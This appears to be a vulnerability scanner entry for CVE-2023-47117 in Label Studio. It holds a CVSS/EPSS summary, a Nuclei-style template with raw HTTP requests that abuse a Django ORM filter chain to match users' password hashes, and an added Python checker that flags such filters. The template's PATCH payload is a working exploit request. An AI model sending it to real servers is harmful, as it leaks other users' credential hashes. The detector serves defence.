CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence: Low
EPSS
Percentile: 95.4%
An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of the query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.0009
    epss-percentile: 0.38398
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950
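
A defensive check for the filter names described above, as an added example (not Label Studio's code or its fix): it audits the JSON body of a view update and flags filter items that traverse relations with `__` or name a sensitive column. The allowlist, the sensitive-name set, the helper names and the sample bodies are constructed assumptions.

```python
import json

PREFIX = "filter:tasks:"
# Assumption: hypothetical allowlist of task columns a filter may reference.
ALLOWED_FIELDS = {"id", "completed_at", "file_upload", "annotators"}
# Assumption: column names that must never be reachable through a filter.
SENSITIVE_PARTS = {"password", "auth_token", "email"}


def check_filter_item(item):
    """Return the reasons one filter item is unsafe (empty list means OK)."""
    name = item.get("filter", "")
    if not name.startswith(PREFIX):
        return ["unexpected filter prefix: " + name]
    path = name[len(PREFIX):]
    parts = path.split("__")
    reasons = []
    if len(parts) > 1:
        reasons.append("relation traversal via '__': " + path)
    if SENSITIVE_PARTS & set(parts):
        reasons.append("sensitive field referenced: " + path)
    if not reasons and parts[0] not in ALLOWED_FIELDS:
        reasons.append("field not on allowlist: " + path)
    return reasons


def audit_view_payload(body):
    """Audit the JSON body of a view update and return all findings."""
    doc = json.loads(body)
    items = doc.get("data", {}).get("filters", {}).get("items", [])
    return [r for item in items for r in check_filter_item(item)]


def make_body(filter_name):
    """Build a constructed sample body with a single filter item."""
    item = {"filter": filter_name, "operator": "regex", "value": "^a", "type": "String"}
    return json.dumps({"data": {"filters": {"conjunction": "or", "items": [item]}}})


if __name__ == "__main__":
    # Constructed samples: the filter name from the template above, and a plain column.
    chained = make_body("filter:tasks:updated_by__active_organization__active_users__password")
    for body in (chained, make_body("filter:tasks:completed_at")):
        print(audit_view_payload(body) or "ok")
```

Rejecting on the allowlist alone is the stronger control; the `__` and sensitive-name checks exist to give a log reviewer a specific reason for the rejection.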